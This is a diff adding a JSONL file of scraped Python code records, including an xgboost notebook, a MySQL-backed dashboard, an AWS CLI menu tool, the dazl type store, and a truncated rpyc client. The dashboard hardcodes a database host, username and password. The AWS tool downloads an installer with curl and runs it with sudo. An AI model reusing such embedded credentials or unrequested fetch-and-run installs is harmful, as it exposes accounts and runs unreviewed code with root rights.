diff --git "a/1729.jsonl" "b/1729.jsonl" new file mode 100644--- /dev/null +++ "b/1729.jsonl" @@ -0,0 +1,655 @@ +{"seq_id":"169357206","text":"\n# coding: utf-8\n\n# In[14]:\n\nimport xgboost as xgb\nimport pandas as pd\nimport numpy as np\nfrom numpy import genfromtxt\nfrom sklearn.metrics import accuracy_score\n\n\n# In[15]:\n\n#loading data:\ncolumns = [\"BQ_TTRA\",\"SEXO\",\"EDAD\",\"NACIO\",\"TITU\",\"RAMA\",\"AMBITO\",\"T_UNIV\",\"DISCA\",\"EST_B1\",\"EST_M1\",\"EST_M2\",\"IDIOMAS\",\"TITIDI1\",\t\"TITIDI2\",\t\"TITIDI3\",\"TIC\",\"PRAC_CR\",\t\"PRAC_CM\",\"EST_XCU\",\"EST_X_M\"]\ndata = np.genfromtxt(\"/Users/RobertPG/Google Drive/aaUPF/4t Berkeley/TFG/Data/ML data/MULTINOMIAL_DATA_xgboost.csv\", delimiter=',')\ndata = pd.DataFrame(data, columns = columns)\n\n# one-hot encoding:\ncat_cols = [\"SEXO\",\"EDAD\",\"NACIO\",\"TITU\",\"RAMA\",\"AMBITO\",\"T_UNIV\",\"DISCA\",\"EST_B1\",\"EST_M1\",\"EST_M2\",\"TITIDI1\",\t\"TITIDI2\",\"TITIDI3\",\"TIC\",\"PRAC_CR\",\"EST_XCU\"]\ndata_encoded = pd.get_dummies(data, columns = cat_cols)\ndata_encoded = pd.DataFrame(data_encoded)\ndata_encoded.head(10)\n\n\n# In[16]:\n\n# creating data subsets:\ntraining_data = data_encoded.iloc[:9500, :]\ntest_data = data_encoded.iloc[9501:, :]\n\n# target definition:\ny_train = training_data[\"BQ_TTRA\"]\ny_test = test_data[\"BQ_TTRA\"]\n\n# training data:\nX_train = training_data.iloc[:, 1:]\nX_test = test_data.iloc[:,1:]\n\n\n# In[17]:\n\n# read in data\ndtrain = xgb.DMatrix(X_train, label = y_train, missing = np.nan)\ndtest = xgb.DMatrix(X_test, label = y_test, missing = np.nan)\n\n\n# In[60]:\n\n# specify parameters via map\nparam = {'max_depth':10, 'eta':0.1, 'silent':0, 'objective':'multi:softmax', 'num_class':8, 'lambda':10, 'gamma':0.5}\nnum_round = 10\nwatchlist = [(dtest, 'test'), (dtrain, 'train')]\nbst = xgb.train(param, dtrain, num_round, watchlist)\n\n\n# In[61]:\n\n# make prediction\npreds = bst.predict(dtest)\n\npredictions = [round(value) for value in preds]\n# evaluate predictions\naccuracy = accuracy_score(y_test, predictions)\nprint(\"Accuracy: %.2f%%\" % (accuracy * 100.0))\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n","sub_path":"Multinomial+Decision+Tree.py","file_name":"Multinomial+Decision+Tree.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"136153408","text":"import MySQLdb # para o MySQL\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib import pyplot\nimport matplotlib as mpl\nimport numpy as np\nimport pandas as pd\n\n\nFontSize = 20\ndef makeGraph():\n # TIRAR ERRO DE RODAR O SERVIDOR TODA HORA.\n plt.switch_backend('agg')\n con = MySQLdb.connect('50.116.112.31', 'tourvi45_aps', 'unip@2020')\n con.select_db('tourvi45_APS')\n cursor = con.cursor()\n\n cursor.execute(\"select distinct(farming) from producers\")\n labels_farming = cursor.fetchall()\n\n cursor.execute(\"select farming, sum(annualamount) from producers group by(farming)\")\n culti_qtd = cursor.fetchall()\n\n cursor.execute(\"select sum(annualamount) from producers\")\n totalCulti = cursor.fetchall()\n\n cursor.execute(\"select count(pesticide) from producers\")\n totalAgri = cursor.fetchall(),\n\n # somando todos os produtos de acordo com seu agrotoxico\n cursor.execute('select pesticide, sum(annualamount) from producers group by(pesticide)')\n agro_qtd = cursor.fetchall()\n\n query = cursor.execute('select distinct(pesticide) from producers')\n labels_pesticide = cursor.fetchall()\n# --------------------------------------------------------------------------------------------\n\n def plot1():\n plot1_cult_qtd = []\n for valor in culti_qtd:\n plot1_cult_qtd.append(valor[1])\n\n plot1_labels = []\n for valor in labels_farming:\n plot1_labels.append(valor[0])\n\n plot1_totalCulti = totalCulti[0]\n\n porcent_culti =[]\n\n for value in plot1_cult_qtd:\n porcent_culti.append((value / plot1_totalCulti[0]) * 100)\n \n porcent = pd.Series(porcent_culti)\n print(porcent)\n\n porcent.astype(float).plot(color = 'blue')\n plt.bar(plot1_labels, porcent_culti, color = '#F2410C')\n # plt.tick_params(labelsize= 11)\n plt.xlabel(\"Produtos\", fontsize = FontSize)\n plt.ylabel(\"% Porcentagem\", fontsize = FontSize)\n plt.savefig(\"App/Static/images/plot1.png\")\n plt.close()\n \n # --------------------------------------------------------------------------------------------\n\n\n def plot2():\n\n plot2_agro_qtd = []\n for valor in agro_qtd:\n plot2_agro_qtd.append(valor[1])\n\n plot2_labels = []\n for valor in labels_pesticide:\n plot2_labels.append(valor[0])\n\n porcent = pd.Series(plot2_agro_qtd)\n\n plt.figure(figsize=(10,8))\n porcent.astype(float).plot(color = 'blue')\n plt.bar(plot2_labels, plot2_agro_qtd, color = 'red')\n plt.tick_params(labelsize= 15)\n plt.xlabel(\"Agrotóxicos\", fontsize = FontSize)\n plt.ylabel(\"Quantidade\", fontsize = FontSize)\n plt.savefig(\"App/Static/images/plot2.png\")\n plt.close()\n\n# --------------------------------------------------------------------------------------------\n def plot3():\n plot3_cult_qtd = []\n for valor in culti_qtd:\n plot3_cult_qtd.append(valor[1])\n\n plot3_labels = []\n for valor in labels_farming:\n plot3_labels.append(valor[0])\n \n plot3_totalCulti = totalCulti[0]\n\n plot3_porcent_culti =[]\n print(plot3_totalCulti[0])\n for value in plot3_cult_qtd:\n plot3_porcent_culti.append((value / plot3_totalCulti[0]) * 100)\n \n plt.pie(plot3_porcent_culti, labels= plot3_labels, autopct=\"%2.2f%%\")\n plt.legend(plot3_labels,bbox_to_anchor = [1, 1])\n plt.savefig(\"App/Static/images/plot3.png\")\n plt.close()\n\n# --------------------------------------------------------------------------------------------\n def plot4():\n\n plot4_labels = []\n for valor in labels_pesticide:\n plot4_labels.append(valor[0])\n\n plot4_agro_qtd = []\n for valor in agro_qtd:\n plot4_agro_qtd.append(valor[1])\n\n plot4_totalagri = totalAgri[0]\n plot4_porcent_agri = []\n\n for value in plot4_agro_qtd:\n plot4_porcent_agri.append((value / plot4_totalagri[0][0]) * 100)\n \n plt.pie(plot4_porcent_agri, labels= plot4_labels, autopct=\"%2.2f%%\")\n plt.legend(plot4_labels, bbox_to_anchor = [1, 1])\n plt.savefig(\"App/Static/images/plot4.png\")\n plt.close()\n \n plot1()\n plot2()\n plot3()\n plot4()\n","sub_path":"App/Controllers/dashboardController.py","file_name":"dashboardController.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"36821643","text":"from typing import List\n\nimport grpc\nfrom google.protobuf.empty_pb2 import Empty\n\nimport baikal.language.custom_dict_pb2 as pb\nimport baikal.language.custom_dict_pb2_grpc as cds\nimport baikal.language.dict_common_pb2 as common\n\n\ndef build_dict_set(domain: str, name: str, dict_set: set) -> common.DictSet:\n \"\"\"\n make a DictSet message using domain, name, and dict_set\n :param domain: the domain name of dict_set\n :param name: name is built-in use only, which is fixed as one of 'np-set', 'cp-set', 'cp-caret'.\n :param dict_set: user provided set of custom dictionary.\n :return: made DictSet data\n \"\"\"\n ret = common.DictSet()\n ret.name = domain + \"-\" + name\n ret.type = common.DictType.WORD_LIST\n for v in dict_set:\n ret.items[v] = 1\n return ret\n\n\nclass CustomDictionaryServiceClient:\n \"\"\"\n The custom dictionary client which can create, update, list, delete your own one.\n 커스텀 사전을 생성, 조회, 업데이트, 삭제하는 클라이언트\n \"\"\"\n stub = None\n\n def __init__(self, remote):\n super().__init__()\n channel = grpc.insecure_channel(remote)\n self.stub = cds.CustomDictionaryServiceStub(channel)\n\n def get_list(self) -> List[pb.CustomDictionaryMeta]:\n req = Empty()\n try:\n res = self.stub.GetCustomDictionaryList(req)\n return res.domain_dicts\n except grpc.RpcError as e:\n print(e)\n return []\n\n def get(self, domain: str) -> pb.CustomDictionary:\n req = pb.GetCustomDictionaryRequest()\n req.domain_name = domain\n try:\n res = self.stub.GetCustomDictionary(req)\n return res.dict\n except grpc.RpcError as e:\n print(e)\n return None\n\n def update(self, domain: str, np: set, cp: set, cp_caret: set) -> bool:\n \"\"\"\n Update custom dictionary.\n :param domain: domain name of these custom dictionaries.\n :param np: proper noun set\n :param cp: compound noun set\n :param cp_caret: splittable compound noun set\n :return: if successfully updated return true\n \"\"\"\n req = pb.UpdateCustomDictionaryRequest()\n req.domain_name = domain\n\n req.dict.domain_name = domain\n\n req.dict.np_set.CopyFrom(build_dict_set(domain, 'np-set', np))\n req.dict.cp_set.CopyFrom(build_dict_set(domain, 'cp-set', cp))\n req.dict.cp_caret_set.CopyFrom(build_dict_set(domain, 'cp-caret-set', cp_caret))\n\n try:\n res = self.stub.UpdateCustomDictionary(req)\n return res.updated_domain_name == domain\n except grpc.RpcError as e:\n print(e)\n return False\n\n def remove_all(self) -> List[str]:\n \"\"\"\n 모든 커스텀 사전을 삭제한 이후에 반환한다.\n :return: 삭제된 도메인의 이름들\n \"\"\"\n req = pb.RemoveCustomDictionariesRequest()\n req.all = True\n\n try:\n res = self.stub.RemoveCustomDictionaries(req)\n return res.deleted_domain_names.keys()\n except grpc.RpcError as e:\n print(e)\n return []\n\n def remove(self, domains: List[str]) -> List[str]:\n \"\"\"\n 지정한 도메인의 커스텀 사전을 삭제한다.\n :param domains: 삭제할 커스텀 사전의 도메인의 배열들\n :return: 정상 삭제 여부\n \"\"\"\n req = pb.RemoveCustomDictionariesRequest()\n req.domain_names.extend(domains)\n req.all = False\n try:\n res = self.stub.RemoveCustomDictionaries(req)\n return res.deleted_domain_names.keys()\n except grpc.RpcError as e:\n print(e)\n return []\n","sub_path":"deeqnlpy/_custom_dict_client.py","file_name":"_custom_dict_client.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"377412030","text":"# aws section of menu driven program\r\n# written by vinay prakash jadhav ARTH20-team12.7 for task8\r\n\r\n# To use this code call the check_requirements() in the main menu driven program while integrating the code and remove the if __name__ == \"__main__\"\r\n\r\n# this program can perform following functions:\r\n# install aws cli on your system if required\r\n# configure aws cli\r\n# create a key-pair and save it on system\r\n# Create a new aws instance\r\n# Start a aws instance\r\n# Describe ec2 instance\r\n# Create a EBS volume\r\n# Attach a EBS volume to ec2 instance\r\n# Create s3 bucket\r\n# Upload a file in bucket\r\n# Create a distribution in aws CloudFront\r\n\r\n#importing os to get system() so that we can execute aws configure command\r\n\r\nimport os\r\n\r\n#importing subprocess to get access to getstatusoutput() so that we can execute aws cli code\r\nimport subprocess\r\n\r\ndef menu():\r\n\tprint(\"\\n-----------aws commands executor-------\")\r\n\r\n\tdef command_executor(command):\r\n\t\tx = subprocess.getstatusoutput(command)\r\n\t\tprint(x[1])\r\n\t\tif x[0] == 0 :\r\n\t\t\tprint(\"command executed successfully\")\r\n\r\n\r\n\t# menu_aws() will execute will display the menu and get the choice from user and prepare a command to be executed\r\n\tdef menu_aws():\r\n\t\twhile True:\r\n\t\t\tprint(60*\"-\")\r\n\t\t\tprint(\"\\t1. Create a key pair\")\r\n\t\t\tprint(\"\\t2. Create a new aws instance\")\r\n\t\t\tprint(\"\\t3. Start a aws instance\")\r\n\t\t\tprint(\"\\t4. Describe ec2 instance\")\r\n\t\t\tprint(\"\\t5. Create a EBS volume\")\r\n\t\t\tprint(\"\\t6. Attach a EBS volume to ec2 instance\")\r\n\t\t\tprint(\"\\t7. Create s3 bucket\")\r\n\t\t\tprint(\"\\t8. Upload a file in bucket\")\r\n\t\t\tprint(\"\\t9. Create a distribution in aws CloudFront\")\r\n\t\t\tprint(\"\\t10. Exit\")\r\n\t\t\tprint(60*\"-\")\r\n\t\t\t\r\n\t\t\tchoice = int(input(\"Enter Choice : \"))\r\n\t\t\tif choice == 1 :\r\n\t\t\t\tkey_name = input(\"Enter key name : \")\r\n\t\t\t\t#original cli command for creating aws key-pair: aws ec2 create-key-pair --key-name MyKeyPair --query 'KeyMaterial' --output text > MyKeyPair.pem\r\n\t\t\t\t#but we want that user should give the name of key pair hence using string manipulation\r\n\t\t\t\tcommand = \"aws ec2 create-key-pair --key-name \" + key_name + \" --output text > \"+ key_name+\".pem\"\r\n\t\t\t\tprint(\"Note: If the key-pair downloaded is not working for ssh login then remove the additional text[metadata of key-pair] from keypair_name.pem file.\")\r\n\t\t\t\tcommand_executor(command)\r\n\r\n\t\t\telif choice == 2:\r\n\t\t\t\timageId = \"ami-052c08d70def0ac62\"\r\n\t\t\t\tinstancetype = \"t2.micro\"\r\n\t\t\t\tinstance_count = \"1\"\r\n\t\t\t\tkey_name = input(\"key-name : \")\r\n\t\t\t\tprint(\"Note : Default values are set so that you do not use options other than free tier\")\r\n\t\t\t\tprint(\"imageId = \" + imageId + \"\\nInstance type = \" + instancetype + \"\\nInstance count = \" + instance_count)\r\n\t\t\t\tcommand = \"aws ec2 run-instances --image-id \"+ imageId + \" --instance-type \" + instancetype + \" --count \" + instance_count + \" --key-name \" + key_name\r\n\t\t\t\tcommand_executor(command)\r\n\r\n\t\t\telif choice == 3:\r\n\t\t\t\tinstanceId = input(\"Enter instance id to start a instance : \")\r\n\t\t\t\tcommand = \"aws ec2 start-instances --instance-ids \"+ instanceId \r\n\t\t\t\tcommand_executor(command)\r\n\r\n\t\t\telif choice == 4:\r\n\t\t\t\tcommand = \"aws ec2 describe-instances\" \r\n\t\t\t\tcommand_executor(command)\r\n\r\n\t\t\t\r\n\t\t\telif choice == 5:\r\n\t\t\t\tprint(\"Note: Size is restricted to 5 Gib per volume to keep you bounded in free tier\")\r\n\t\t\t\tsize = input(\"Enter size of ebs volume : \")\r\n\t\t\t\tregion = input(\"Enter availability zone : \")\r\n\t\t\t\tif int(size) <= 5 : \r\n\t\t\t\t\tcommand = \"aws ec2 create-volume --volume-type gp2 --size \" + size + \" --availability-zone \" + region\r\n\t\t\t\telse: \r\n\t\t\t\t\tprint(\"Size must be less than 5 Gib\")\r\n\t\t\t\tcommand_executor(command)\r\n\t\t\t\r\n\t\t\telif choice == 6:\r\n\t\t\t\tvolume_id = input(\"Enter Volume id of ebs storage : \")\r\n\t\t\t\tinstance_id = input(\"Enter Instance id :\")\r\n\t\t\t\tdevice = input(\"Enter device name[ex - /dev/sdf] : \")\r\n\r\n\t\t\t\tcommand = \"aws ec2 attach-volume --volume-id \" + volume_id + \" --instance-id \" + instance_id + \" --device \" + device\r\n\t\t\t\tcommand_executor(command)\r\n\t\t\t\r\n\t\t\telif choice == 7:\r\n\t\t\t\tbucket_name = input(\"Enter bucket name : \")\r\n\t\t\t\tregions3 = input(\"Enter region : \")\r\n\t\t\t\tcommand = \"aws s3api create-bucket --bucket \" + bucket_name + \" --region \" + regions3\r\n\t\t\t\tcommand_executor(command)\r\n\r\n\t\t\telif choice == 8:\r\n\t\t\t\tfile_path = input(\"Enter file path[ex - c:\\\\users\\\\d\\\\desktop\\\\image.jpg] : \")\r\n\t\t\t\tbucket_name1 = input(\"Enter bucket name\")\r\n\t\t\t\tfilename = input(\"What should be the file name of your file in s3 bucket? : \")\r\n\r\n\t\t\t\tcommand = \"aws s3 cp \" + file_path + \" s3://\" + bucket_name1 + \"/\" + filename\r\n\t\t\t\tcommand_executor(command)\r\n\t\t\t\r\n\t\t\telif choice == 9:\r\n\t\t\t\tdomain_name = input(\"Enter a domain to create a distribution : \")\r\n\t\t\t\tcommand = \"aws cloudfront create-distribution --origin-domain-name \" + domain_name\r\n\t\t\t\tcommand_executor(command)\r\n\t\t\t\r\n\r\n\t\t\telif choice == 10:\r\n\t\t\t\tprint(\"Exited from AWS command Executer\")\r\n\t\t\t\tbreak\r\n\r\n\r\n\t# check_requirements() is used to check whether aws cli is installed in the system on which the menu driven program is going to run\r\n\tdef check_requirements():\r\n\t\tprint(\"checking requirements...\")\r\n\t\tx = subprocess.getstatusoutput(\"aws --version\")\r\n\t\tif x[0] != 0 :\r\n\t\t\tprint(\"AWS cli not installed on your system\")\r\n\t\t\tprint(\"please install aws cli\")\r\n\t\t\tch = input(\"press [y/n] = \" )\r\n\t\t\tif ch == \"y\" or ch == \"Y\":\r\n\t\t\t\tos.system(\" curl \\\"https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip\\\" -o \\\"awscliv2.zip\\\"\")\r\n\t\t\t\tos.system(\"unzip awscliv2.zip\")\r\n\t\t\t\tos.system(\"sudo ./aws/install\")\r\n\t\t\t\tcheck_requirements()\r\n\t\t\telse:\r\n\t\t\t\tprint(\"aws cli required to run aws commands\")\r\n\t\t\t\t\r\n\t\telse:\r\n\t\t\tprint(\"aws cli is installed on system..\")\r\n\t\t\tprint(\"Everything is okay!!\")\r\n\t\t\tprint(\"Configuring aws cli..\")\r\n\t\t\tos.system(\"aws configure\")\r\n\t\t\tmenu_aws()\r\n\r\n\t\r\n\tcheck_requirements()\r\n\r\n\r\n#To test this program, call menu() or remove the comment from next line\r\n#menu()\r\n\r\n'''\r\n\treferences:\r\n\thttps://docs.aws.amazon.com/cli/latest/userguide/cli-services-ec2-keypairs.html\r\n\r\n\r\n\tuse the command sudo pip install awscli --force-reinstall --upgrade if even after aws installation on linux system you are getting error that aws not found\r\n\r\n\r\n'''\r\n","sub_path":"AWS.py","file_name":"AWS.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"204733526","text":"from dataclasses import dataclass\n\nfrom scripts.paths import api_problem_list_url, web_problem_list_url, web_collection_obj_url, api_collection_obj_url\n\n\n@dataclass\nclass ApiCollection:\n basename: str\n index: int\n title: str\n short_title: str\n difficulty: int\n size: int\n web_url: str\n api_url: str\n description: str = ''\n\n def tojson(self):\n return dict(\n basename=self.basename,\n index=self.index,\n title=self.title,\n short_title=self.short_title,\n difficulty=self.difficulty,\n size=self.size,\n web_url=self.web_url,\n api_url=self.api_url,\n description=self.description)\n\n\ndef new_collection(\n basename: str,\n index: int,\n title: str,\n short_title: str,\n difficulty: int,\n size: int,\n description: str = ''):\n return ApiCollection(\n basename=basename,\n index=index,\n title=title,\n short_title=short_title,\n difficulty=difficulty,\n size=size,\n web_url=web_collection_obj_url(collection_basename=basename),\n api_url=api_collection_obj_url(collection_basename=basename),\n description=description)\n","sub_path":"scripts/models/ApiCollection.py","file_name":"ApiCollection.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"282051530","text":"# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.\n# SPDX-License-Identifier: Apache-2.0\n\nfrom collections import defaultdict\nfrom functools import reduce\nfrom operator import add\nfrom threading import RLock\nfrom types import MappingProxyType\n\nfrom dataclasses import dataclass\nfrom typing import Any, Collection, Dict, Generic, List, Mapping, Optional, Sequence, TypeVar, \\\n Union, TYPE_CHECKING\n\nfrom .types import Template, TemplateChoice, Type, TypeReference, UnresolvedTypeReference, \\\n TypeAdjective, ConcreteType, ValueReference\nfrom ..util.typing import safe_cast, safe_dict_cast\n\nif TYPE_CHECKING:\n from ..damlast.daml_lf_1 import Archive, Expr, Package\n\nT = TypeVar('T')\n\n\nclass PackageStoreBuilder:\n \"\"\"\n Convenience class for building up a :class:`PackageStore`.\n \"\"\"\n\n def __init__(self):\n self._archives = list() # type: List[Archive]\n self._value_types = dict() # type: Dict[ValueReference, Expr]\n self._data_types = dict() # type: Dict[TypeReference, Type]\n self._templates = dict() # type: Dict[TypeReference, Template]\n\n def add_archive(self, archive: 'Archive') -> None:\n self._archives.append(archive)\n\n def add_type(self, name: TypeReference, data_type: Type):\n safe_cast(TypeReference, name)\n safe_cast(Type, data_type)\n self._data_types[name] = data_type\n\n def add_value(self, name: ValueReference, value: 'Expr'):\n self._value_types[name] = value\n\n def add_template(self, template: Template):\n self._templates[template.data_type.name] = safe_cast(Template, template)\n\n def get_type(self, name: TypeReference) -> Optional[Type]:\n return self._data_types.get(name)\n\n def build(self) -> 'PackageStore':\n return PackageStore(self._archives, self._value_types, self._data_types, self._templates)\n\n\nclass PackageStore:\n \"\"\"\n A thread-safe store of type information.\n \"\"\"\n\n @classmethod\n def empty(cls):\n \"\"\"\n Create an empty store.\n \"\"\"\n return cls([], {}, {}, {})\n\n def __init__(\n self,\n archives: 'Collection[Archive]',\n value_types: 'Dict[ValueReference, Expr]',\n data_types: 'Dict[TypeReference, Type]',\n templates: 'Dict[TypeReference, Template]'):\n self._lock = RLock()\n self._archives = list(archives)\n self._cache = PackageStoreCache(EMPTY_TYPE_CACHE, EMPTY_TYPE_CACHE, EMPTY_TYPE_CACHE)\n self._value_types = value_types # safe_dict_cast(ValueReference, Expr, value_types)\n self._data_types = safe_dict_cast(TypeReference, Type, data_types)\n self._templates = safe_dict_cast(TypeReference, Template, templates)\n\n def archives(self) -> 'Collection[Archive]':\n \"\"\"\n Return a copy of the collection of the set of loaded :class:`Archive`s.\n \"\"\"\n with self._lock:\n return list(self._archives)\n\n def packages(self) -> 'Collection[Package]':\n \"\"\"\n Return a copy of the collection of the set of loaded :class:`Package`s.\n \"\"\"\n with self._lock:\n return [a.package for a in self._archives]\n\n def package_ids(self) -> 'Collection[str]':\n \"\"\"\n Return a copy of the collection of the set of loaded :class:`Package`s.\n \"\"\"\n with self._lock:\n return [a.hash for a in self._archives]\n\n def register_all(self, other_store: 'PackageStore') -> 'PackageStore':\n \"\"\"\n Register all types declared in the other :class:`PackageStore`.\n\n :param other_store: A package store to copy types, templates, and choices from.\n :return: A reference to this object.\n \"\"\"\n if self is not other_store:\n with self._lock:\n self._archives.extend(other_store._archives)\n self._value_types.update(other_store._value_types)\n self._data_types.update(other_store._data_types)\n self._templates.update(other_store._templates)\n self._cache = PackageStoreCache(\n TypeCache.build(self._value_types),\n TypeCache.build(self._data_types),\n TypeCache.build(self._templates))\n return self\n\n def resolve_value_reference(self, value_ref: ValueReference) -> 'Expr':\n with self._lock:\n return self._value_types[value_ref]\n\n def resolve_type_reference(self, template_ref: TypeReference) -> Type:\n \"\"\"\n Resolve a type based on its reference.\n\n :param template_ref:\n A :class:`TypeReference` that refers to a type.\n :return:\n The :class:`Type` that is referred to by this type reference.\n :raise KeyError:\n If the :class:`TypeReference` does not have a corresponding value in this store.\n \"\"\"\n safe_cast(TypeReference, template_ref)\n\n with self._lock:\n return self._data_types[template_ref]\n\n def find_types(self, adjective: TypeAdjective = TypeAdjective.ANY) \\\n -> Mapping[TypeReference, ConcreteType]:\n with self._lock:\n if adjective == TypeAdjective.ANY:\n return MappingProxyType(dict(self._data_types))\n\n return {tt: data_type\n for tt, data_type in self._data_types.items()\n if isinstance(data_type, ConcreteType)\n and data_type.adjective & adjective != TypeAdjective.NONE}\n\n def resolve_template(self, template: Union[None, str, TypeReference, UnresolvedTypeReference]) \\\n -> Collection[Template]:\n \"\"\"\n Return a collection of :class:`Template` instances that match the specified template name.\n\n Some special parameters:\n * If ``\"*\"`` is passed in, all templates are returned.\n * If ``None`` is passed in, an empty collection is returned.\n\n :param template:\n A template name or a :class:`TypeReference`.\n :return:\n A collection of matching templates, or an empty collection if none match. This method\n never returns ``None``.\n \"\"\"\n from .lookup import validate_template\n\n if isinstance(template, Template):\n # if we were given a Template for some strange reason, just simply return a single-item\n # tuple of that given Template\n return [template]\n\n package_id, template_name = validate_template(template)\n return self._cache.templates.lookup(package_id, template_name)\n\n def resolve_template_type(\n self, template: 'Union[None, str, TypeReference, UnresolvedTypeReference]') \\\n -> Dict[TypeReference, Type]:\n \"\"\"\n Return a collection of types that match for the template.\n\n :param template:\n A template name or a :class:`TypeReference`.\n :return:\n A dictionary of possible matches, or empty if there are no matches. This method never\n returns ``None``.\n \"\"\"\n return {template.data_type.name: template.data_type\n for template in self.resolve_template(template)}\n\n def resolve_choice(self, template: Any, choice: str) -> Dict[TypeReference, TemplateChoice]:\n \"\"\"\n Return all possible choices for the combination of template identifier and choice name.\n If template is ``'*'`` or ``None``, all choices with the specified name are returned.\n \"\"\"\n matches = dict()\n for t in self.resolve_template(template):\n for c in t.choices:\n if c.name == choice:\n matches[t.data_type.name] = c\n return matches\n\n\nclass PackageProvider:\n \"\"\"\n Interface to an object that can provide package information.\n \"\"\"\n\n def get_package_ids(self) -> 'Sequence[str]':\n \"\"\"\n Return the current universe of package IDs.\n \"\"\"\n raise NotImplementedError\n\n def fetch_package(self, package_id: str) -> bytes:\n \"\"\"\n Retrieve the bytes that correspond to a package.\n \"\"\"\n raise NotImplementedError\n\n def get_all_packages(self) -> 'Mapping[str, bytes]':\n return {pkg_id: self.fetch_package(pkg_id) for pkg_id in self.get_package_ids()}\n\n\nclass MemoryPackageProvider(PackageProvider):\n def __init__(self, mapping: 'Mapping[str, bytes]'):\n self.mapping = mapping\n\n def get_package_ids(self) -> 'Sequence[str]':\n return list(self.mapping.keys())\n\n def fetch_package(self, package_id: str) -> bytes:\n return self.mapping.get(package_id)\n\n\n@dataclass(frozen=True)\nclass PackageStoreCache:\n value_types: 'TypeCache[Type]'\n data_types: 'TypeCache[Type]'\n templates: 'TypeCache[Template]'\n\n\n@dataclass(frozen=True)\nclass TypeCache(Generic[T]):\n \"\"\"\n Immutable cache of type information.\n\n Instance attributes:\n\n .. attribute:: TypeCache.by_package_lookup\n\n A mapping from package ID strings to another mapping, where keys are fully-qualified type\n names for templates to a collection of matching Template instances. These collections are\n never non-empty; they will only ever contain multiple entries if there is a collision in\n dot-separated names. None of these maps contain ``'*'`` as keys; wildcards mut be\n implemented by the caller.\n\n .. attribute:: TypeCache.by_name_lookup\n\n A mapping from fully-qualified type names to a sub-mapping, where the sub-mapping keys are\n package IDs and the value are collections of Template. None of these maps contain ``'*'``\n as keys; wildcards mut be implemented by the caller.\n \"\"\"\n\n everything: Collection['T']\n by_package_lookup: 'Mapping[str, Mapping[str, Collection[T]]]'\n by_name_lookup: 'Mapping[str, Mapping[str, Collection[T]]]'\n\n @classmethod\n def build(cls, objects: 'Mapping[TypeReference, T]') -> 'TypeCache[T]':\n everything = tuple(objects)\n by_package_lookup = defaultdict(lambda: defaultdict(list))\n by_name_lookup = defaultdict(lambda: defaultdict(list))\n\n for k, v in objects.items():\n for package_id in (k.module.package_id, '*'):\n for valid_name in (k.full_name, k.full_name_unambiguous, '*'):\n by_package_lookup[package_id][valid_name].append(v)\n by_name_lookup[valid_name][package_id].append(v)\n\n return TypeCache(\n everything,\n _immutable_mmc(by_package_lookup),\n _immutable_mmc(by_name_lookup))\n\n def lookup(self, package_id: str, type_name: str) -> Collection[T]:\n \"\"\"\n Look up items based on package ID and type name. The values cannot be ``None``, but they\n can be the special-meaning ``'*'`` value.\n \"\"\"\n safe_cast(str, package_id)\n safe_cast(str, type_name)\n\n if package_id == '*':\n candidates = reduce(add, self.by_name_lookup.get(type_name, {}).values(), ())\n elif type_name == '*':\n candidates = reduce(add, self.by_package_lookup.get(package_id, {}).values(), ())\n else:\n candidates = self.by_package_lookup.get(package_id, {}).get(type_name, ())\n\n return {t.data_type.name.full_name_unambiguous: t for t in candidates}.values()\n\n\ndef _immutable_mmc(mapping: 'Mapping[str, Mapping[str, Collection[T]]]') -> \\\n 'Mapping[str, Mapping[str, Collection[T]]]':\n \"\"\"\n Create an immutable copy of :class:`TemplateStoreCache` data structures.\n \"\"\"\n return MappingProxyType({\n k1: MappingProxyType({k2: tuple(v) for k2, v in v1.items()})\n for k1, v1 in mapping.items()\n })\n\n\nEMPTY_MAPPING = MappingProxyType({})\nEMPTY_TYPE_CACHE = TypeCache((), EMPTY_MAPPING, EMPTY_MAPPING)\n","sub_path":"python/dazl/model/types_store.py","file_name":"types_store.py","file_ext":"py","file_size_in_byte":11801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"596437412","text":"#-*- coding: utf-8 -*-\nfrom typing import List\nimport math\n\nimport time\ndef timeit(func):\n def wrapped(*args, **kwargs):\n start = time.time()\n ret = func(*args, **kwargs)\n elapsed = time.time() - start\n print(\"elapsed: %s\" % elapsed)\n return ret\n return wrapped\n\nimport sys\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n mini = sys.maxsize\n maxi = None\n max_diff = 0\n for price in prices:\n if price < mini:\n mini = price\n maxi = price\n else:\n mini = min(mini, price)\n maxi = max(maxi, price)\n #print(\"maxi:%s, mini:%s\" % (maxi, mini))\n max_diff = max(max_diff, maxi - mini)\n return max_diff\n\n\nsamples = [\n ([7,1,5,3,6,4], 5),\n ([7,6,4,3,1], 0),\n]\n\n\nfor S, expected in samples:\n ans = Solution().maxProfit(S)\n print(ans)","sub_path":"lc/esy/20191002_esy_121_best_time_buy_and_sell_stock.py","file_name":"20191002_esy_121_best_time_buy_and_sell_stock.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"255242557","text":"#!/usr/bin/env python\n\nimport cPickle as pickle\nimport functools\nimport inspect\nimport datetime\n\nimport rpyc\n\n__VERSION__ = '0.81'\nPROXY_SERVER = 'MiRmdDbU1.MackenzieFinancial.bz' # UAT\n\nproxy_connection = rpyc.connect(PROXY_SERVER, 18866)\n\n_mark = datetime.datetime.now()\n_reloadtimeout = datetime.timedelta(0,300)\n\ndef pickle_and_call_helper(func_name, *args):\n arglist = pickle.dumps(args, protocol=2)\n data = 